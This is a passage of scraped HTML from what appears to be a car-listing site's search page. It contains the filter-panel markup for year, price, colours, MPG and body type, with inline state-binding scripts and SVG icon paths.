? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.years&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" (function () { var all = h(&#x27;filtersState.availableFilters.years.items&#x27;).map(function(x) { return x().value(); }) var selected = (h(&#x27;filtersState.selectedFilters.years&#x27;) || []).map(function(x) { return x(); }) var index = all.indexOf(&#x27;{{value}}&#x27;) var isLastItem = (all.length - 1) === index var nextItem = isLastItem ? null : all[index + 1] var isNextSelected = selected.length !== 0 &amp;&amp; nextItem != null &amp;&amp; selected.includes(nextItem) var res = selected if (selected.includes(&#x27;{{value}}&#x27;)) { if (isNextSelected) { var unselectValues = all.slice(0, index + 1) res = selected.filter(function(x) { return !unselectValues.includes(x); }) } else { res = selected.filter(function(x) { return x !== &#x27;{{value}}&#x27;; }) } } else { if (selected.length === 0) { res = selected.concat([&#x27;{{value}}&#x27;]) } else { var mni = all.indexOf(selected[0]) var mxi = all.indexOf(selected[selected.length - 1]) if (index !== -1) { mni = Math.min(mni, index) mxi = Math.max(mxi, index) } res = all.slice(mni, mxi + 1) } } jzlMergeState({ filtersState: { selectedFilters: { years: res } }, }) })() "><span>{{label}}</span></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;priceRange&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;priceRange&quot;]) } })"> <span>Price <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;priceRange&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;priceRange&quot;; }) } })"> <span>Price <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;priceRange&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;priceRange&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;priceRange&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD EiSIn" data-jzlbind-list="h('filtersState.availableFilters.priceRange.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.priceRange&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.priceRange&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" (function () { var all = h(&#x27;filtersState.availableFilters.priceRange.items&#x27;).map(function(x) { return x().value(); }) var selected = (h(&#x27;filtersState.selectedFilters.priceRange&#x27;) || []).map(function(x) { return x(); }) var index = all.indexOf(&#x27;{{value}}&#x27;) var isLastItem = (all.length - 1) === index var nextItem = isLastItem ? null : all[index + 1] var isNextSelected = selected.length !== 0 &amp;&amp; nextItem != null &amp;&amp; selected.includes(nextItem) var res = selected if (selected.includes(&#x27;{{value}}&#x27;)) { if (isNextSelected) { var unselectValues = all.slice(0, index + 1) res = selected.filter(function(x) { return !unselectValues.includes(x); }) } else { res = selected.filter(function(x) { return x !== &#x27;{{value}}&#x27;; }) } } else { if (selected.length === 0) { res = selected.concat([&#x27;{{value}}&#x27;]) } else { var mni = all.indexOf(selected[0]) var mxi = all.indexOf(selected[selected.length - 1]) if (index !== -1) { mni = Math.min(mni, index) mxi = Math.max(mxi, index) } res = all.slice(mni, mxi + 1) } } jzlMergeState({ filtersState: { selectedFilters: { priceRange: res } }, }) })() "><span>{{label}}</span></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;exteriorColors,interiorColors&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;exteriorColors,interiorColors&quot;]) } })"> <span>Colors <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;exteriorColors&quot;,&quot;interiorColors&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;exteriorColors,interiorColors&quot;; }) } })"> <span>Colors <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;exteriorColors&quot;,&quot;interiorColors&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;exteriorColors,interiorColors&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;exteriorColors,interiorColors&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-fUdGnz VwNga"><div class="sc-giOsra iEGKLZ">Exterior</div><div class="sc-kMBllD kVZZIj" data-jzlbind-list="h('filtersState.availableFilters.exteriorColors.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.exteriorColors&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-gLdKKF bYkCMZ buttonComponent plain sc-hkaZBZ dNLSpI" data-jzlbind-class="&#x27;sc-gLdKKF bYkCMZ &#x27; + ( (h(&#x27;filtersState.selectedFilters.exteriorColors&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { exteriorColors: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;exteriorColors&#x27;) ? ( h(&#x27;filtersState.selectedFilters.exteriorColors&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.exteriorColors&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.exteriorColors&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><div class="sc-RWGNv cUIvKI"><div class="sc-gCUMDz material-icons sc-dTsoBL buQGVb">radio_button_unchecked</div><div class="sc-gCUMDz material-icons sc-btewqU gkvaZZ">lens</div><div class="sc-gCUMDz material-icons sc-imapFV dQQWRv" style="color:{{color}}">lens</div></div><div class="sc-fATqzn ejmNCW">{{label}}</div></div></div></script></div></div><div class="sc-fUdGnz VwNga"><div class="sc-giOsra iEGKLZ">Interior</div><div class="sc-kMBllD kVZZIj" data-jzlbind-list="h('filtersState.availableFilters.interiorColors.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.interiorColors&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-gLdKKF bYkCMZ buttonComponent plain sc-hkaZBZ dNLSpI" data-jzlbind-class="&#x27;sc-gLdKKF bYkCMZ &#x27; + ( (h(&#x27;filtersState.selectedFilters.interiorColors&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { interiorColors: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;interiorColors&#x27;) ? ( h(&#x27;filtersState.selectedFilters.interiorColors&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.interiorColors&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.interiorColors&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><div class="sc-RWGNv cUIvKI"><div class="sc-gCUMDz material-icons sc-dTsoBL buQGVb">radio_button_unchecked</div><div class="sc-gCUMDz material-icons sc-btewqU gkvaZZ">lens</div><div class="sc-gCUMDz material-icons sc-imapFV dQQWRv" style="color:{{color}}">lens</div></div><div class="sc-fATqzn ejmNCW">{{label}}</div></div></div></script></div></div></div></div><div role="button" tabindex="0" data-jzlbind-hidden="h('filtersSearchState.additionalFiltersShown')" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { additionalFiltersShown: true } })" class="sc-ZUflv gySaQJ"><span class="text">More Filters</span></div><div hidden="" data-jzlbind-hidden="!h('filtersSearchState.additionalFiltersShown')"><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;mpgCityRange,mpgHighwayRange,mpgCombinedRange&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;mpgCityRange,mpgHighwayRange,mpgCombinedRange&quot;]) } })"> <span>MPG <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;mpgCityRange&quot;,&quot;mpgHighwayRange&quot;,&quot;mpgCombinedRange&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;mpgCityRange,mpgHighwayRange,mpgCombinedRange&quot;; }) } })"> <span>MPG <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;mpgCityRange&quot;,&quot;mpgHighwayRange&quot;,&quot;mpgCombinedRange&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;mpgCityRange,mpgHighwayRange,mpgCombinedRange&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;mpgCityRange,mpgHighwayRange,mpgCombinedRange&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-fUdGnz VwNga"><div class="sc-giOsra iEGKLZ">City</div><div class="sc-kMBllD uUDKz" data-jzlbind-list="h('filtersState.availableFilters.mpgCityRange.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.mpgCityRange&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.mpgCityRange&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { mpgCityRange: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;mpgCityRange&#x27;) ? ( h(&#x27;filtersState.selectedFilters.mpgCityRange&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.mpgCityRange&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : [&#x27;{{value}}&#x27;] ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div><div class="sc-fUdGnz VwNga"><div class="sc-giOsra iEGKLZ">Highway</div><div class="sc-kMBllD uUDKz" data-jzlbind-list="h('filtersState.availableFilters.mpgHighwayRange.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.mpgHighwayRange&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.mpgHighwayRange&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { mpgHighwayRange: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;mpgHighwayRange&#x27;) ? ( h(&#x27;filtersState.selectedFilters.mpgHighwayRange&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.mpgHighwayRange&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : [&#x27;{{value}}&#x27;] ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div><div class="sc-fUdGnz VwNga"><div class="sc-giOsra iEGKLZ">Combined</div><div class="sc-kMBllD uUDKz" data-jzlbind-list="h('filtersState.availableFilters.mpgCombinedRange.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.mpgCombinedRange&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.mpgCombinedRange&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { mpgCombinedRange: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;mpgCombinedRange&#x27;) ? ( h(&#x27;filtersState.selectedFilters.mpgCombinedRange&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.mpgCombinedRange&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : [&#x27;{{value}}&#x27;] ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;bodyTypes&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;bodyTypes&quot;]) } })"> <span>Body <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;bodyTypes&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;bodyTypes&quot;; }) } })"> <span>Body <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;bodyTypes&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;bodyTypes&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;bodyTypes&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><svg class="sc-jbWsrJ jpHvxP"><symbol id="convertible" viewBox="0 0 14.77 5.21"><path d="M12.42,8.82a.3.3,0,1,1-.3-.3A.3.3,0,0,1,12.42,8.82ZM6.71,7H5.94v.22h.77ZM3.8,8.52a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.8,8.52Zm1.88-.18v.28h4.66Zm9.16.87-.14,0a4.06,4.06,0,0,1-1.08.1H13.2a1.2,1.2,0,0,1-1.93.33h0A1.2,1.2,0,0,1,11,9.34H4.88a1.21,1.21,0,0,1-.23.33h0a1.2,1.2,0,0,1-1.93-.33H2.38a2.35,2.35,0,0,1-.74-.14H1V8.93L.83,8.82l-.08,0V7.64l0,0a1,1,0,0,0,.14-.42L1,6.12,3,6h.55l.09-.3c0-.14.1-.27.25-.28a.27.27,0,0,1,.28.25l0,.37c.3,0,.57.07.85.11l.7.1a.25.25,0,0,1,0-.17l.09-.3c0-.14.1-.27.25-.28a.27.27,0,0,1,.28.25l0,.4a.21.21,0,0,1-.05.15H9.21a.16.16,0,0,1,.17,0l.09.05h0l.18,0A5.25,5.25,0,0,0,7.94,5.21L8,4.89l.27.06h0L8.5,5a16.16,16.16,0,0,1,2.28,1.18,20.26,20.26,0,0,1,2.37.42c1.15.29,1.53.75,1.58,1ZM4.64,8.82a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.64,8.82Zm8.32,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13,8.82Zm1.52.12V8.68h-.14a.11.11,0,0,1-.1.07h-.16a.12.12,0,0,1-.12-.12V8.5a.12.12,0,0,1,.12-.12h.16a.11.11,0,0,1,.1.07h.12l0-.57h-.26a.83.83,0,0,0-.38.1l-.32-.57h.74a3.25,3.25,0,0,0-1.13-.49,20.37,20.37,0,0,0-2.36-.41,4.62,4.62,0,0,0-.57.05l-.4,0s0,.06,0,.09a.16.16,0,0,1-.13.08.11.11,0,0,1,0,.15l-.07,0a.11.11,0,0,1-.09,0l-.09-.12H9.23a.16.16,0,0,1-.12,0,.15.15,0,0,1,0-.1H6.15c-.45,0-.81-.09-1.15-.15a8.64,8.64,0,0,0-2-.14l-1.75.09,0,.37h.67V7c0,.23-.37.44-.64.44h-.1a1.65,1.65,0,0,1-.11.27v.85A3.08,3.08,0,0,0,2.38,9V8.75A1.42,1.42,0,0,1,3.8,7.33h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9H10.7V8.75a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9h.08A4.08,4.08,0,0,0,14.48,8.94Z"></path></symbol><symbol id="coupe" viewBox="0 0 14.77 5.21"><path d="M3.95,6.21a5.82,5.82,0,0,1,3-.71A4.48,4.48,0,0,1,9.4,6.3h0a.63.63,0,0,0-.2.43l-4.8-.18A.6.6,0,0,1,3.95,6.21ZM10,6.84a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11L9.71,7a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,10,6.84Zm2.24,1.65a.3.3,0,1,0,.3.3A.3.3,0,0,0,12.26,8.49ZM5.72,8.32v.28h4.71ZM6.71,7H5.94v.22h.77Zm8,2.22-.14,0a3.87,3.87,0,0,1-.92.1h-.34a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H4.87a1.2,1.2,0,0,1-.22.33h0a1.17,1.17,0,0,1-1.92-.33H2.38v0A2.3,2.3,0,0,1,2,9.24H1.24V9L.95,8.79l-.08,0v-1l.05,0a.75.75,0,0,0,.22-.39l0-1.06L2.3,6.1A8.65,8.65,0,0,1,6.87,5a5.29,5.29,0,0,1,3,1l.67.38a13.27,13.27,0,0,1,2.49.31c.92.24,1.51.55,1.58.84ZM4.64,8.8a.84.84,0,1,0-.84.84A.84.84,0,0,0,4.64,8.8Zm8.46,0a.84.84,0,1,0-.84.84A.84.84,0,0,0,13.1,8.8Zm1.28.12V8.57h-.14a.11.11,0,0,1-.1.07H14a.12.12,0,0,1-.12-.12V8.39A.12.12,0,0,1,14,8.27h.16a.11.11,0,0,1,.1.07h.13l0-.57H14a.83.83,0,0,0-.38.1l-.32-.57h.49A5.65,5.65,0,0,0,13,7a13.32,13.32,0,0,0-2.46-.3l-.08,0-.72-.41a5,5,0,0,0-2.84-.95A8.42,8.42,0,0,0,2.42,6.41l-.06,0-.85.08v.18h.68v.22c0,.23-.37.44-.64.44H1.47a1.06,1.06,0,0,1-.26.49v.72A3.22,3.22,0,0,0,2.38,9V8.72a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9h5.63V8.72a1.41,1.41,0,0,1,.42-1h0a1.41,1.41,0,0,1,1-.42h0a1.41,1.41,0,0,1,1,.42h0a1.41,1.41,0,0,1,.42,1V9A3.68,3.68,0,0,0,14.38,8.92ZM3.8,8.49a.3.3,0,1,0,.3.3A.3.3,0,0,0,3.8,8.49Z"></path></symbol><symbol id="crossover" viewBox="0 0 14.77 5.21"><path d="M5.66,5.28H7.77A11.31,11.31,0,0,1,11,6.7L9.88,6.64a.27.27,0,0,0,0-.13.78.78,0,0,0-.41-.34.27.27,0,0,0-.28.06h0A.57.57,0,0,0,9,6.6C7,6.51,5.11,6.45,3,6.45A3,3,0,0,1,5.66,5.28Zm5.89,3.13a.27.27,0,1,0,.27.27A.27.27,0,0,0,11.55,8.41Zm-7.24,0a.27.27,0,1,0,.27.27A.27.27,0,0,0,4.31,8.41ZM13.8,9l-.14,0a3.7,3.7,0,0,1-.83.1h-.32a1.06,1.06,0,0,1-1.93,0H5.28a1.08,1.08,0,0,1-1.74.29,1.09,1.09,0,0,1-.2-.29H3a2.23,2.23,0,0,1-1.35-.54l-.05,0v-1l0,0a3.81,3.81,0,0,0,.25-.86L2,6.36c.08-.31,1-.87,1.33-1.08L3.11,5l.25,0a18.09,18.09,0,0,1,2.3-.16H7.79a13.68,13.68,0,0,1,3.86,1.61,2.54,2.54,0,0,1,2,1l0,.07ZM5.06,8.68a.75.75,0,1,0-.75.75A.75.75,0,0,0,5.06,8.68Zm7.24,0a.75.75,0,1,0-.75.75A.75.75,0,0,0,12.3,8.68Zm1.14.08,0-.33h-.16a.11.11,0,0,1-.1.07H13a.12.12,0,0,1-.12-.12V8.26A.12.12,0,0,1,13,8.14h.16a.11.11,0,0,1,.1.07h.15l0-.57H13.2a.83.83,0,0,0-.38.1l-.32-.57H13a3.18,3.18,0,0,0-1.44-.46l-.07,0A13.48,13.48,0,0,0,7.77,5.11H5.66a17.12,17.12,0,0,0-2,.13l.09.16-.15.08a5.34,5.34,0,0,0-1.32,1l-.06.24h.37v.22c0,.2-.28.37-.52.42a1.91,1.91,0,0,1-.12.33v.76A1.92,1.92,0,0,0,3,8.82V8.61A1.29,1.29,0,0,1,4.31,7.33h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21h4.68V8.61a1.29,1.29,0,0,1,1.28-1.28h0a1.28,1.28,0,0,1,.91.38h0a1.28,1.28,0,0,1,.38.91v.21A3.39,3.39,0,0,0,13.45,8.76ZM7.91,7.05H7.43v.22h.48Zm1.83-.32a.16.16,0,0,0,0-.16.67.67,0,0,0-.35-.29.16.16,0,0,0-.17,0h0a.47.47,0,0,0-.15.33.16.16,0,0,0,.16.17h.11l.09.12a.11.11,0,0,0,.09,0l.07,0a.11.11,0,0,0,0-.15A.16.16,0,0,0,9.74,6.73ZM5.24,7H4.76v.22h.48Zm.68,1.31v.28H9.59Z"></path></symbol><symbol id="hatchback" viewBox="0 0 14.77 5.21"><path 